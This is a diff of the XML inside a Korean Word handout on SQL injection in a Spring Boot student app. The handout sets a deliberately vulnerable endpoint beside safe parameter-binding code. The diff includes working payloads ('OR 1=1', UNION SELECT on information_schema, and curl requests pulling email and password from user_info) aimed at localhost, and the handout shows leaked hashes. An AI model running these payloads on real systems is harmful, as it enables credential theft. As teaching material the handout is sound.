+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>데이터 탈취 : UNION SELECT 로 실제 테이블 값 조회</w:t>
       </w:r>
     </w:p>
@@ -1989,16 +2459,7 @@
         <w:t>com.basic.myspringboot.vuln.sqli</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> 패키지와 /api/vuln/sqli/** 경로로 격리</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>되었다</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. 기존 정상 검색 기능은 안전하게 유지된다.</w:t>
+        <w:t xml:space="preserve"> 패키지와 /api/vuln/sqli/** 경로로 격리되었다. 기존 정상 검색 기능은 안전하게 유지된다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2271,20 +2732,19 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="ad"/>
         <w:tblW w:w="8000" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000"/>
         </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="1900"/>
@@ -2591,12 +3051,135 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:spacing w:before="180" w:after="90"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:color w:val="2E5496"/>
         </w:rPr>
-      </w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>JPA 네이티브 (명명 파라미터 바인딩)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>// [안전]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>String sql = "SELECT student_id, name, student_number FROM students WHERE name LIKE :name";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>entityManager.createNativeQuery(sql)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">             .setParameter("name", "%" + name + "%")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">             .getResultList();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">참고 : </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">이 프로젝트의 실제 검색 기능(StudentSearchService, StudentRepository)은 JPQL의 파라미터 바인딩을 사용하므로 안전하다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:spacing w:before="320" w:after="160"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1F3864"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1F3864"/>
+        </w:rPr>
+        <w:t>7. 실습 : 단계별 공격 재현</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2609,216 +3192,24 @@
           <w:bCs/>
           <w:color w:val="2E5496"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>JPA 네이티브 (명명 파라미터 바인딩)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
-          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>// [안전]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>String sql = "SELECT student_id, name, student_number FROM students WHERE name LIKE :name";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>entityManager.createNativeQuery(sql)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">             .setParameter("name", "%" + name + "%")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
-          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">             .getResultList();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>참고 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>이 프로젝트의 실제 검색 기능(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>StudentSearchService</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>StudentRepository</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)은</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> JPQL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">의 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>파라미터</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 바인딩을 사용하므로 안전하다. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:spacing w:before="320" w:after="160"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1F3864"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1F3864"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1F3864"/>
-        </w:rPr>
-        <w:t>실습 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1F3864"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 단계별 공격 재현</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:spacing w:before="180" w:after="90"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E5496"/>
-        </w:rPr>
         <w:t>실습 엔드포인트</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="ae"/>
         <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000"/>
         </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="4600"/>
@@ -3126,7 +3517,24 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>GET /api/vuln/sqli/students?name=Alice</w:t>
+        <w:t xml:space="preserve">GET </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8">
+        <w:r>
+          <w:rPr>
+            <w:color w:val="1155CC"/>
+            <w:u w:val="single"/>
+          </w:rPr>
+          <w:t>http://localhost:8080/api/vuln/sqli/students?name=Alice</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3166,7 +3574,30 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>name = %' OR '1'='1</w:t>
+        <w:t xml:space="preserve">GET </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9">
+        <w:r>
+          <w:rPr>
+            <w:color w:val="1155CC"/>
+            <w:u w:val="single"/>
+          </w:rPr>
+          <w:t>http://localhost:8080/api/vuln/sqli/students?name=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="27262E"/>
+        </w:rPr>
+        <w:t>%' OR '1'='1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3287,7 +3718,6 @@
           <w:bCs/>
           <w:color w:val="2E5496"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">단계 5. DB 메타정보 탈취 </w:t>
       </w:r>
     </w:p>
@@ -3305,25 +3735,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>name = %' UNION SELECT table_schema, table_name, 3 FROM information_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>schema.tables</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> #</w:t>
+        <w:t>name = %' UNION SELECT table_schema, table_name, 3 FROM information_schema.tables #</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3367,41 +3779,61 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t># 이후는 서버로 전송되지 않는다</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — # 는 URL 프래그먼트라 브라우저가 잘라낸다. 주석 종결자 # 가 사라져 UNION이 완성되지 않는다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>공백·% 처리가 브라우저마다 다르다</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 인코딩이 어긋나 구문이 깨진다.</w:t>
       </w:r>
     </w:p>
@@ -3452,13 +3884,7 @@
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">실제 실행 결과(발췌) — 학생 8명 뒤에 계정/해시가 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>같이 출력됩니다.</w:t>
+        <w:t>실제 실행 결과(발췌) — 학생 8명 뒤에 계정/해시가 같이 출력됩니다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3475,25 +3901,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">[[1,"Alice Johnson","CS001"], </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>... ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>[8,"Helen Lee","CS003"],</w:t>
+        <w:t>[[1,"Alice Johnson","CS001"], ... ,[8,"Helen Lee","CS003"],</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3552,6 +3960,479 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>curl "</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+            <w:color w:val="1155CC"/>
+            <w:sz w:val="18"/>
+            <w:szCs w:val="18"/>
+            <w:u w:val="single"/>
+          </w:rPr>
+          <w:t>http://localhost:8080/api/vuln/sqli/students-safe?name=%25%27%20UNION%20SELECT%20id,email,password%20FROM%20user_info%20%23</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>TOKEN=$(curl -s -X POST http://localhost:8080/api/userinfos/login \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -d '{"email":"user@aa.com","password":"pwd2"}' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  | sed -n 's/.*"accessToken":"\([^"]*\)".*/\1/p')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>curl -H "Authorization: Bearer $TOKEN" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+            <w:color w:val="1155CC"/>
+            <w:sz w:val="18"/>
+            <w:szCs w:val="18"/>
+            <w:u w:val="single"/>
+          </w:rPr>
+          <w:t>http://localhost:8080/api/search/students?keyword=%25%27%20UNION%20SELECT%20id,email,password%20FROM%20user_info%20%23</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
